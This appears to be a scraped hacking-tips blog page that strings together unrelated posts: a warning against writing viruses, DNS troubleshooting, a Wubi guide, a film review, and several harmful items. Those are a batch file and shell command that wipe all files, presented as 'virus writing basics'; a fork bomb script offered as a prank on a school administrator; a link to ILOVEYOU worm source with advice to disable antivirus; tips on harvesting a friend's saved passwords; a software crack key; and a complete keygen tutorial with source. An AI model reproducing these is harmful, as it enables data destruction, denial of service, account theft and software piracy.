Stop Creating Viruses

If you are interested in creating a computer virus, trojan, worm, or other malicious program as revenge, payback, or as a prank for an individual or a company I suggest you re-think.

Creating a program to delete files or to cause other issues with a persons computer resolves nothing, may cause you additional issues, may cause you to be prosecuted by the law. In other words you could be fined and/or sent to prison.
Users who are interested in creating computer viruses or other programs should consider learning to program in a computer programming language. You will learn a lot more by learning one or more programming languages and you will become more qualified in getting hired at a company that designs programs. No one ever got hired by a reputable company for writing computer viruses.

If I create a good computer virus wont I become famous?

No, the only fame you will likely get is a news article and maybe a picture of you when you are handcuffed and being sent to prison. In fact if you were to write a computer virus that was effective and infected several computers or networks you would more than likely not wish to become famous at the fear of being prosecuted by the law.

I only want to write a virus to learn how they work.

You will learn a lot more about how computer programs and viruses work by learning to program then you ever will by writing and tinkering with computer viruses.

If I write a good virus I'll get hired at a security firm or antivirus company.

False, no respectable security firm or antivirus company wants to affiliated with an individual who has created a program that has infected potential customers computers. If you're interested in getting hired on at a security firm, antivirus company, or just want to get into the security field it would be much better to learn programming, become a participant in security discussions, become a beta tester, and/or attempt to find vulnerabilities in programs and operating systems and report them to the companies.

Read More

Recover Deleted Data

Friends it may happen that you formatted you harddrive and lost important data. May be you deleted an file accidentally and now you want that file. In this circumstances how to recover the file back. 

Actually when we write any thing on hard drive it is written in terms of blocks of data. When you delete some data its entry in the FAT table is removed and the blocks are then appended in free list. But the data written to the blocks is not physically erase from the disk and hence the data is still there on the physical disk.

Thus you need a software which can search data at sector level and can retrive data.

Many of softwares are available on net but the user intreface is difficult and so the process become tedios for users. I have a solution to it. The Recover My files is a software which search for deleted FAT entries and search you disk at sector level. It provide a easy user interface to recover data from the hard drive. It also gives an option for specific file extension to retrieve.

Thus download it and recover the GB's of deleted data from your hard drive.

Download Now

Read More

How To Extract Saved Password From Internet Explorer, Mozilla Firefox, Google Chrome, Yahoo Messenger, Gtalk And Msn

It is Quite Dangerous to save your password in Internet Explorer, Mozilla FireFox, Google Chrome, or even in Messengers.
Whenever you select “Remember my Password” option, then your Passwords are Automatically saved into your Computer, for further use.
The saved Passwords can be retrieved quite easily.
It is more dangerous when you are using public computers. In that case anyone can easily extract your password and misuse it.

Here is the Tip on how to Extract Saved Passwords:-

1) Internet Explorer
You can Download the Software IE PassView

IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports all the version including Internet Explorer v4.0 v6.0, 7.0, Beta version 8.0.

2) Google Chrome
You can Download the Software Google Chrome Pass

ChromePass is a small password recovery tool that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry, the following information is displayed: Origin URL, Action URL, User Name Field, Password Field, User Name, Password, and Created Time. You can also save them in Text and Xml Files.

3) Messengers like Yahoo, Gtalk and Msn
You can use the Download Messenger Key

Messenger Key is a freeware utility to recover passwords of your favorite messengers. Messenger Key recovers passwords for ICQ, MSN, Google Talk and Yahoo instant messengers. All Versions are Supported.

4) Mozilla FireFox

First way:-

You can Easily see the Password in Mozilla Firefox without using software,
Just Follow the following steps:-

I. Open Mozilla then Go to tools
II. Select options tab
III. Then Choose Security
IV. In the second box titled “passwords” you will see “SHOW PASSWORDS option there, just Click it.
V. Now You will see the user name and password.

Second way:-

You can also download the Software Password Fox

PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

It is also quite Easy to Retrieve Save Passwords using Java Script. If you need the code for that i’ll give you.

SECURITY TIP: DONT SAVE YOUR PASSWORD IN YOUR COMPUTER BECAUSE IT CAN BE HACKED EASILY EVEN FROM REMOTE COMPUTER.

Read More

C/c++ program without main

There is no way that you can have a c program without main . Without the main your compiler will not know where to begin the execution of the program. So main is a must bust can fool your friends with this trick.

#include
#define decode(s,t,u,m,p,e,d) m##s##u##t
#define begin decode(a,n,i,m,a,t,e)

int begin()
{
printf(" hello ");
}

We are making use of preprocessor directive #define. A Preprocessor is program which processess the source code before compilation.

In the # define decode(s,t,u,m,p,e,d) you are asking the compiler to merge the 4th,1st,3rd & the 2nd characters(tokens). with the help of ##. So what you get "msut"
Similarly when you do decode(a,n,i,m,a,t,e) you get main. Now you are equating it to begin. So whereever the compiler find begin it will replace it with main. Using this principle/trick you can change anything.

Read More

How to ''Quickly'' Test DNS Resolution

This article is laid out so that it will show you how to not only use the tools, but also how to pick them. This is helpful because to just learn the tool’s name and all the switches you can use with it may not be particularly helpful to you if you don’t know when you would use a particular switch with a command. I have seen this a million times in books that are trying to drill this information into your head so that you remember it, problem is, if there is no scenario, you know, a real world – in the pits – scenario, pure memorization of the tool and its switches becomes pointless then because although you may have them memorized, how would you use them to resolve problems?

Consider Ping. Why would you use a Ping command with a ( -a ) switch? Let’s consider a problem where you would have to test DNS resolution, a user can’t get to an Internet website. Now, I know there are many ways you can test to establish what the problem is but let’s assume we wanted to quickly see if DNS was the problem, we isolated the problem that far, it’s definitely something wrong with DNS resolution. The DNS Cache was also flushed (ipconfig /flushdns which purges the DNS Resolver cache). So now, we will quickly test DNS with Ping? Yes, Ping with a particular switch can be used to solve a problem such as ‘why can’t we get to that URL, http://compIntranet?’ Well, do you know if you have DNS resolution such as a HOST file entry or the company DNS server assignments in the TCP/IP configuration properties configured via a DHCP server? Test DNS on your local PC to make sure you aren’t the problem first. If you get a complaint that users can’t get to http://compIntranet then you should make sure that you aren’t the problem first. Make sure you have DNS resolution. You can do this many ways, but one of the ways you can do it with the Ping command is with the ping –a ip_address command which will try to query resolve DNS to find out what the host name is.

You have to see if DNS resolution is working you can see if the DNS server you are configured to query knows what it’s talking about. Using the NSLOOKUP command shows this information.


   C:\WINDOWS\SYSTEM32>nslookup
   Default Server: ns3.srv.hcvlny.cv.net
   Address: 167.206.112.3


   > www.yahoo.com
   Server: ns3.srv.hcvlny.cv.net
   Address: 167.206.112.3


   Non-authoritative answer:
   Name: www.yahoo.akadns.net
   Addresses: 216.109.118.74, 216.109.118.75, 216.109.118.77,
       216.109.117.204, 216.109.117.205, 216.109.118.69,
   Aliases: www.yahoo.com


When I query my local DNS server, I can see that Yahoo.com has multiple IP addresses that can be used.


Now, it’s possible to ping with the –a switch to also verify if DNS resolution is work. Pinging Yahoo’s IP address with the –a switch produces the DNS name of the system.


   C:\WINDOWS\SYSTEM32>ping -a 216.109.118.74
   Pinging p11.www.dcn.yahoo.com [216.109.118.74] with 32 bytes of data:
   Reply from 216.109.118.74: bytes=32 time=22ms TTL=51
   Reply from 216.109.118.74: bytes=32 time=25ms TTL=51
   Reply from 216.109.118.74: bytes=32 time=27ms TTL=51
   Reply from 216.109.118.74: bytes=32 time=32ms TTL=51
   Ping statistics for 216.109.118.74:
      Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
   Approximate round trip times in milli-seconds:
      Minimum = 22ms, Maximum = 32ms, Average = 26ms

Although a simple example of using command line tools, we were able to also see why we would want to use them. See, so this guide does just sound like a machine telling you that ping is a command line tool that uses the ICMP echo protocol to send packets to … blah, blah, and blah! It’s a useful guide to help you understand why you would use them as well. It also shows you why you would use such switches that are available with the most common tools! Hopefully this will help you know when to use each one and help you create that precision needed in your troubleshooting steps.

Read More

How To Hide Files In A Calculator?

Having read the title of this post you may be wondering if it’s really possible. Yeah! It is possible. As the word suggests, it’s a calculator with a safe which is capable of storing and keeping your files and folders safe. The safe calculator looks just like the default calculator in Windows and in fact it can even perform calculations just like any other calculator. Well in earlier posts you can find more ways of hiding particular file or folder. This is just another way to keep check on your data. When you start Safe Calculator it will look just like the the normal calculator.

The default code/ pin for the safe is ‘123’. So, to unlock you need to type ‘123’ in the calculator and press on ‘MS’, now the calculator will enter into safe mode. Here you can change the defaultpin if you want by clicking on ‘New pin’.

Now click on ‘+’ and then ‘=’ to confirm and enter into the safe to browse and choose the files you want to hide. Click on ‘Store’ once you’re done.

Download Safe Calculator

Read More

Hacking password and Recovery

Friends it happen many times that normally on our computer our google toolbar or mozilla remember the password for us.

It may happen that for a long time you use the remember password and so you may forget the password.

Now from the password field it is not possible to copy and paste as normal text.The browser will not allow you to copy.

In such situation you can login with the remember password but not get the original password.

I have got the solution for you.

The solution is the magic Window.

Magic window is a award winning software which when put on the ****** feild of password shows the actual password. Hence the trick is simple just Drag the magic window on password textbox and you will be able to see the original password in text format.

This trick can really become a hacking trick.

It is possible that your friend may use your computer and login and the browser saves his password.

Now you can use the magic window to get his password and enjoy with his account. Download Magic Window


[This post was originally posted by Jainam Shah]

Read More

Teen Patti begins with Venkat Subramanium (Amitabh Bachchan) invited to the presitigious Cambridge University by Mathematics genius Perci Trachtenberg (Sir Kingsley). On meeting, Venkat an eccentric mathematics scholar himself narrates his personal tale of his invented theory and his tryst with the gambling world while using it. Venkat narrates how after writing a thesis on the theory of Probability his seniors didn’t agree with his theory. But when he plays an online game of cards of Teen Patti, he realises that his theory is right. He immediately shares it with his junior professor Shantanu (R Madhavan). In order to verify the theory, the two rope in their three students Aparna aka Apu (Shraddha Kapoor), Sid (Siddharth Kher) and Bikram (Dhruv). They all go to a casino and try their hand at the game. They play the game employing the theory and win it. But soon greed comes in and other emotions follow, which gets them all into trouble. An unknown blackmailer starts calling Subramanium and demanding a big share in the money they make from their games. The blackmailer even starts dictating which games they should play next. A richie rich student Abbas (Vaibhav) too joins the group. Subramanium starts suspecting the blackmailer to be one amongst his group members but soon a situation arises where he gets convinced its none of them but someone else who is playing the game on him. What happens next makes up for the film.

The first thing that came to mind when the promos Teen Patti came was is it inspired from 21. But well though there are a few similarities, one can say that it’s a completely different film. Teen Patti is lavishly mounted and with the kind of subject it deals in is presented with intricate detail. In short, it is not your average Bollywood fare. But the confusing application of the theory of probability with the game of Teen Patti is definitely all set to go above many a viewers head. While the first half is lot of things happening and keeping you at the edge of the seat with the intriguing happenings, the second half is where it loses its steam big time. Repetitiveness, unimpressive cameos by Ajay Devgan, Saira Mohan, confused narrative and a pro longed climax brings the graph of the film completely down. Also the talk-a-thon between Bachchan and Kingsley seems to be never ending and at times even acts a spoke in the wheel of the narrative. However, the edgy moments in the first half have turned up really well, especially the group’s first tryst with Teen Patti at a gambling den amongst real Bhais.
Amitabh Bachchan is simply superb as the eccentric professor. Madhavan with a tinge of grey shade to his character is just excellent. Raima Sen playing his fiancée however gets no scope. Shakti Kapoor’s debutante daughter Shraddha Kapoor impresses. The talented newcomer surely will go a long way. Amongst the male newcomers all three – Vaibhav, Dhruv and Siddharth have good screen presence and talent to match. There are cameos by Ajay Devgan, Saira Mohan, Jackie Shroff, Shakti Kapoor with the most impressive one being by Mahesh Manjrekar. Sir Ben Kingsley is just first rate.

Camerawork by Aseem Bajaj matches international standards. Aarti Bajaj’s editing work however makes the film more confusing than it should have been. Salim-Suleiman’s music barring the Neeyat song featuring Brazilian hottie Mariah is nothing much to write about.
Teen Patti is a hatke experience which is no harm in trying provided you are willing to be a little patient with its second half. 
by - Sampurn

Read More

Total Video Converter (Fully Cracked) Download

Want to play movies and other clips on mobile. You need a converter to convert it to 3Gp format or any other mobile supported format

Total video conveter is the converter software which convert the format .avi .mpeg .wmi .vob .mp3 .flv and many more formats to .3gp .avi .mpeg which are supported by the mobile phone.

Also you can compress audio from mp3 To rm And vice versa Also it convers mp3 to amr,ogg,itunes,rm and many more formats

The crack is been publish here so you need to download the video converter and register using the crack given below and enjoy movies on your mobile

Download Total video Converter

Crack: 0ab52023-ba00347e-9fa86acd-fdc330a9-68578b7e-264b81e1-30bdfeef-cea403fa-20457e4a-39c03409-f69a9aba-388e8a94-677044c7-643fe9ac-66523c91-18a61801

Download and register with crack given above ;-)

Read More

Install Linux and Windows in same Folder

Friends as we know that to install linux we need to create a separate partition of windows logical drive which is empty and so we need to format a logical drive before use.

So what about if the linux can be install on the same logical partion where windows is install and without harming or deleting any windows content.

You think this is not possible but my friend you are wrong this time it is possible.

The reason is that when we try to install Linux from a linux setup in the same partition where windows is install then it will not detect any windows data and overwrite its data on important *.dll system files of windows. Hence windows will crash and you will not be able to boot windows.

This happens due to the installer of linux is not capable of detecting windows. So if a installer of linux is there which detect windows then the above problem can be solved and so here I have found the solution which is 100% working and very useful.

Now you have an easy-to-use tool for installing Ubuntu linux into your PCs without disturbing your Windows installation.

One of the latest releases by Ubuntu, Wubi can do it for you. With Wubi you can install or uninstall Ubuntu on Windows in same folder.

That implies you don't need partitioning for installation.
Wubi is a Windows application which runs in windows environment and can be downloaded for free here.

The installation can be accomplished without re-partitioning of the drive and there is no risk for wiping out of existing data.

Requirements:

Certain requirements you need to meet before installation.

1) Ensure that you download the right version of Wubi for Ubuntu installation

2) If you are using a disc, make sure it's a standard desktop version of Ubuntu.

3) You need to have - 256 MB memmory, 5 GB harddisk space and Windows 98, 2000, XP, Vista.

Steps to install UBHUNTU linux in Windows partition.

Follow the steps below for installation

1) Copy ISO setup of ubhuntu with Wubi executable in one folder.

2) Double  click the Wubi executable. The installer will detect the ISO file and installation starts.

3) Windows will ask you to enter the admin username and password for the windows. Enter them and remember them as you would need them to enter the distribution.

4) When prompted, enter the size that you want to allocate for the distribution on the hard drive. Also  choose the location where you want to install the Ubuntu.

When you are done with the above step, a folder will be created in its place having the necessary partitions as files in it.

5) Now click on the install to start the installation.

When the installation is complete reboot your system. You will find an option for booting into Ubuntu.

Now that you are done with the installation.

Uninstalling Ubuntu.

Later on, if you decide that Ubuntu isn't meant for you, uninstall it.

Uninstalling Ubuntu is pretty much same as uninstalling any other Windows application.
Here are the steps to Uninstall Ubuntu.

1) After booting into Window, click on the Start button

2) Enter the Control Panel and  select the Add/Remove Programs option.

3) Click on the Ubuntu and then click on the Change/Remove

4) Click on the Uninstall.
Once you are over with it Ubuntu will be removed from your computer.

I think you are done with the UBUNTU linux installation from windows in windows partition.

Download Webi now

Read More

You can generate thousands of Crack with a single go...

ZCRACK is a site that gives you an opportunity to download cracks and serials for miscellaneous software products. You can make crack download on this site without any probles and fees. Crack sites often contain different kind of adware. Be sure this site is absolutely free of any kind of adware, exploits, porn popups etc.Nothing will prevent you from downloading cracks and serials.

After crack download you will get an archive (zip or rar), unpackit and just apply to a specific software or application.

All cracks are absolutely free, that means that you don`t have to pay money for crack and crack download. NOBODY gets profit from crack download or crack creating. Crack download is simple way to access program that you can`t buy, but remeber if you like this software don`t make crack download - BUY THIS SOFTWARE )


[Courtesy : www.zcrack.com]

Read More

Delete all files

This is the virus wirting basics section. Today we are going to show you how to delete all content. This is demonstrated using DOS programming and also in LINUX.

DOS programming

Paste the given code in notepad


@Echo off

Del C:\ *.*y


And save it like any_name.bat . Now run this file... All the data is gone from your PC.

LINUX

Just run the command
rm *.* will delete all files of any extension. This is the code of the "Black Wolf" virus.This is in c.
This virus corrupts all the .com files . so be extremely careful what you do with it.

Read More

Heard about FORK BOMB Virus (Rabbit Virus)??? Now learn how to make it ;-)

Hey guys, I ‘ve got a new thing for all u guys to have fun with, its very easy and fun to do. Before we start coding ill explain what a fork bomb actually is.

A fork bomb or rabbit virus opens an application bar. For example cmd.exe so many times that its overloads the computers processor which results in the computer either overheating, shutting down or in some cases you can get a BSOD (Blue Screen of Death). Unlike little batch viruses like the shutdown one you cannot stop a fork bomb unless you extremely 1337 so once it starts it goes until it does its job.

Most Anti-Virus software will not pick a fork bomb or rabbit virus, as far as its concerned its just a batch file the opens and application.

Background

Fork Bombs aka Rabbit viruses have been around for ages due to their effectiveness to evade anti-virussoftware. I came across it when i wanted to play a practical joke on my schools administrator for his birthday. Just to let you know it worked and hes not some n00b. I find them very effective just don’t bomb yourself.

The code

Ok this is the code that you type into notepad.exe remember to save it as a .bat or if you want it in a dorminant for save it as a .txt

One more thing…I am not responsible if you kills your computer or somebody else computer with or without permission. Now that we have that out a the way here we go…

Blocks of code should be set as style “Formatted” like this.

:s

START %0

GOTO :s

Read More

The ILOVEYOU WORM - Have your own VIRUS

The ILOVEYOU worm, also known as VBS/Loveletter and Love Bug worm, is a computer worm written in VBScript.
-------------------------------------------------------------------------
Description

The worm arrived in e-mail boxes on May 4, 2000, with the simple subject of ``ILOVEYOU`` and an attachment ``LOVE-LETTER-FOR-YOU.TXT.vbs``.

Two aspects of the worm made it effective:

* It relied on social engineering to entice users to open the e-mail and ensure its continued propagation.
* It employed a mechanism — VBScripts — that, while not entirely novel, had not been exploited to such a degree previously to direct attention to their potential, reducing the layers of protection that would have to be navigated for success.

here is the source code of one of the most famous virus the hits cyberspace

NOTE : THIS IS ONLY FOR EDUCATIONAL PURPOSE.  Moreover it is easily scaned by Anti-Virus so when ever you are trying please turn-off your antivirus.

Download Notepad file from : http://saeaset.com/ILOVEYOU-WORM.txt

Read More

Branding Windows Xp with your Name and Details.

Many of you wish someday you have your own Operating System Well that's good but until you can't have your own windows, why not branding your name instead of Windows.

Open notepad dump the following lines into it and save it with the name OEMINFO.INI in the c:\windows\system32 directory:


     [General]
     Manufacturer=Your Name Here
     Model=Your Model Here
     [Support Information]
     Line1=Your Name Here
     Line2=Your Address Here
     Line3=Your Email Address Here


Save the file, then make a right click on my computer select properties, in the general tab a button will be highlighted (support information) make a click on it, you will be able to see the changes.

Now if you want to display some more information then simply increase the line in the file.
eg: Line4=Your Working Hours Here


Enjoy your own created version of windows.....:-)

Read More

How to make key generators?

How to make key generators?

-===========================-
Introduction
------------
I take no responsibility of the usage of this information.
This post, is for educational knowledge ONLY.

Hi there, in this post, I intend to teach you how to make a pretty simple keygen, of a program called W3Filer 32 V1.1.3.
W3Filer is a pretty good web downloader...I guess some of you might know the program.

I`ll assume you know:
A.How to use debugger (in this case, SoftIce).
B.How to crack, generally (finding protection routines,patching them,etc...).
C.How to use Disassembler.
D.Assembly.
E.How to code in Turbo Pascal (tm).

Tools you`ll need:
A. SoftIce 3.00/01 or newer.
B. WD32Asm. (Not a must).
C. The program W3Filer V1.13  can be found in www.windows95.com I believe.
D. Turbo Pascal (ANY version).

Well, let's go cracking...
Run W3Filer 32.
A nag screen pops, and , demands registration (Hmm, this sux ;-)) Now, We notice this program has some kind of serial number (Mine is 873977046), Let's keep the serial in mind, I bet we`ll meet it again while we're on the debugger.
Well, now, let's put your name and a dummy reg code...set a BP on GetDlgItemTextA, and, press OK.
We pop inside GetDlgItemTextA, Lets find the registration routine...I`ll save you the work, the registration routine is this:
:00404DB2 8D95A8FAFFFF lea edx, dword ptr [ebp+FFFFFAA8]
:00404DB8 52 push edx ---> Your user name here.
:00404DB9 E80B550000 call 0040A2C9 ---> Registration routine.
:00404DBE 83C408 add esp, 00000008 ---> Dunno exactly what is it.
:00404DC1 85C0 test eax, eax ---> Boolean identifier, 0 if
:00404DC3 7D17 jge 00404DDC ---> registration failed, 1 if
OK.
Well, Let's enter the CALL 40A2C9, and see what's inside it:
(Please read my comments in the code).
* Referenced by a CALL at Addresses:
|:00404DB9 , :00407F76
|
:0040A2C9 55 push ebp
:0040A2CA 8BEC mov ebp, esp
:0040A2CC 81C4B0FEFFFF add esp, FFFFFEB0
:0040A2D2 53 push ebx
:0040A2D3 56 push esi
:0040A2D4 57 push edi
:0040A2D5 8B5508 mov edx, dword ptr [ebp+08]
:0040A2D8 8DB500FFFFFF lea esi, dword ptr [ebp+FFFFFF00]
:0040A2DE 33C0 xor eax, eax
:0040A2E0 EB16 jmp 0040A2F8
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040A2FB(C)
|
:0040A2E2 0FBE0A movsx ecx, byte ptr [edx] ----> Here Starts the interesting part.
:0040A2E5 83F920 cmp ecx, 00000020 ----> ECX is the the current char in the user name, Hmm, 20h=' '...
:0040A2E8 740D je 0040A2F7 ----> Let's see,
:0040A2EA 8A0A mov cl, byte ptr [edx] ----> Generally, all this loop does, is copying the user name from
[EDX], to [ESI], WITHOUT the spaces!
(Keep this in mind! ).
:0040A2EC 880C06 mov byte ptr [esi+eax], cl
:0040A2EF 42 inc edx
:0040A2F0 40 inc eax
:0040A2F1 C6040600 mov byte ptr [esi+eax], 00
:0040A2F5 EB01 jmp 0040A2F8
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040A2E8(C)
|
:0040A2F7 42 inc edx
* Referenced by a (U)nconditional or (C)onditional Jump at Addresses:
|:0040A2E0(U), :0040A2F5(U)
|
:0040A2F8 803A00 cmp byte ptr [edx], 00
:0040A2FB 75E5 jne 0040A2E2 ----------------> This is the loop , we got what it does, Let's continue tracing the code...
:0040A2FD 56 push esi --------> The user name is pushed, in order to Upcase it's chars.
* Reference To: USER32.CharUpperA, Ord:0000h
|
:0040A2FE E80F330000 Call User!CharUpper ---> After this, our name is in upper case.
:0040A303 56 push esi -----> Our name in upper case here.
* Reference To: cw3220mt._strlen, Ord:0000h
|
:0040A304 E86F300000 Call 0040D378 ---> This is the length of our name.
:0040A309 59 pop ecx
:0040A30A 8BC8 mov ecx, eax ---> ECX=Length.
:0040A30C 83F904 cmp ecx, 00000004 ---> Length>=4 (MUST).
:0040A30F 7D05 jge 0040A316 ---> Let's go to this address...
:0040A311 83C8FF or eax, FFFFFFFF
:0040A314 EB67 jmp 0040A37D
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040A30F(C)
|
:0040A316 33D2 xor edx, edx
:0040A318 33C0 xor eax, eax
:0040A31A 3BC8 cmp ecx, eax
:0040A31C 7E17 jle 0040A335 ---> (Not important, just another useless checking).

================================================
 FROM HERE AND ON, THE IMPORTANT CODE, ATTENTION
================================================

One thing before we continue, EDX = 00000000h as we enter to the next instructions.
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040A333(C)
|
:0040A31E 0FBE1C06 movsx ebx, byte ptr [esi+eax] ---> EBX <--- char in user
name, offset EAX.
:0040A322 C1E303 shl ebx, 03 -----> Hmm, it shl's the char by 03h...(Remember that).
:0040A325 0FBE3C06 movsx edi, byte ptr [esi+eax] ---> Now EDI <--- Char in user name , offset EAX.
:0040A329 0FAFF8 imul edi, eax -----> It multiplies the char by the offset in user name! Remember that).
:0040A32C 03DF add ebx, edi -----> Adds the result to EBX (That was Shelled (Ding Dong =)).
:0040A32E 03D3 add edx, ebx -----> EDX=EDX+EBX!!! - This is the CORE of this registration routine!!!
:0040A330 40 inc eax -----> Increase EAX by one (next char).
:0040A331 3BC8 cmp ecx, eax
:0040A333 7FE9 jg 0040A31E ----> If ECX loop.
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040A31C(C)
|
:0040A335 A120674100 mov eax, dword ptr [00416720] ---> HMMMMMM, What's in here????
:0040A33A C1F803 sar eax, 03 ---------> WAIT! Please type in SIce '?
EAX'
Does this number in EAX look familiar to us? ;-) 
If you still don`t understand, than, It's our SERIAL NUMBER! (PLEASE, take
your time, and check by yourself - don`t trust me!). OK,
so now we know, That it SHR's EAX by 03 (SAR is
almost identical to SHR).
:0040A33D 03D0 add edx, eax ---------> Hmm, it adds the result from the loop, the serial number shr'd by 03h
:0040A33F 52 push edx -------> Let's continue. (At this point, I can tell you , the reg number, is in EDX - only that the reg number is in HEX --> That's how you enter it).
* Possible StringData Ref from Data Obj ->"%lx"
|
:0040A340 685EF54000 push 0040F55E
:0040A345 8D95B0FEFFFF lea edx, dword ptr [ebp+FFFFFEB0]
:0040A34B 52 push edx
* Reference To: USER32.wsprintfA, Ord:0000h
|
:0040A34C E8E5320000 Call 0040D636 -------> This one, does HEX2STR (Takes the value from EDX, and turns it to an hex string).
:0040A351 83C40C add esp, 0000000C
:0040A354 8D8DB0FEFFFF lea ecx, dword ptr [ebp+FFFFFEB0] -----> type 'd ecx' -
THIS is the reg number! That's enough for us, the rest of the code, is just for comparing the correct reg code with ours.
:0040A35A 51 push ecx
* Reference To: USER32.CharLowerA, Ord:0000h
|
:0040A35B E8B8320000 Call 0040D618
:0040A360 8D85B0FEFFFF lea eax, dword ptr [ebp+FFFFFEB0]
:0040A366 50 push eax
:0040A367 FF750C push [ebp+0C]
* Reference To: cw3220mt._strcmp, Ord:0000h
|
:0040A36A E875300000 Call 0040D3E4
:0040A36F 83C408 add esp, 00000008
:0040A372 85C0 test eax, eax
:0040A374 7405 je 0040A37B
:0040A376 83C8FF or eax, FFFFFFFF
:0040A379 EB02 jmp 0040A37D
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040A374(C)
|
:0040A37B 33C0 xor eax, eax
* Referenced by a (U)nconditional or (C)onditional Jump at Addresses:
|:0040A314(U), :0040A379(U)
|
:0040A37D 5F pop edi
:0040A37E 5E pop esi
:0040A37F 5B pop ebx
:0040A380 8BE5 mov esp, ebp
:0040A382 5D pop ebp
:0040A383 C3 ret

Making the actual Keygen
~~~~~~~~~~~~~~~~~~~~~~~~
Now, after I've explained how does the program calculate the registration code, you can either write your own keymaker, without looking at my code, or look at my code (in Turbo Pascal - sorry for all you C lovers ;-) Next time). That's it, here's the source of my keygen:

------------------- Cut here --------------------------
Program W3FilerKeygen;
var
Key,SerialNum,EB,ED,digit:Longint;
I,x:Byte;
Name,KeyHex:String;
begin
Writeln(' W3Filer32 V1.1.3 Keymaker');
writeln('Cracked by ^pain^ ''97 / Rebels!');
Write('Your Name:'); { Read the name }
readln(Name);
Write('Serial Number:');
readln(SerialNum); {Yes, we need the serial number for the calculation!}
Key:=0;
x:=0;
For I:=1 to length(Name) do
begin
Name[I]:=upcase(Name[i]);
If Name[I]<>' ' then begin
eb:=ord(Name[I]) shl 3; {EB = Name[I] Shl 03h}
Ed:=ord(Name[I]); {ED = Name[I]}
ed:=ed*(x); {ED=ED*Offset}
inc(x);
eb:=eb+ed; {Add ED to EB}
Key:=Key+EB; {Add EB to KEY}
end;
end;
Key:=Key+(SerialNum shr 3); { Add SerialNum shr 03h to Key}
{ From here, this is just HEX2STRING --> I`m quite sure it's
Self explaintory, else - go and learn number bases again! ;-)}
KeyHex:='';
repeat
digit:=Key mod 16;
key:=key div 16;
If digit<10 then KeyHex:=Chr(Digit+ord('0'))+KeyHex;
If digit>10 then KeyHex:=Chr(Digit-10+ord('a'))+KeyHex;
until key=0;
writeln('Your Key:',KeyHex);
writeln(' Enjoy!');
end.

[Note : This post is originally posted by Rahul Dutt Avasthy]

Read More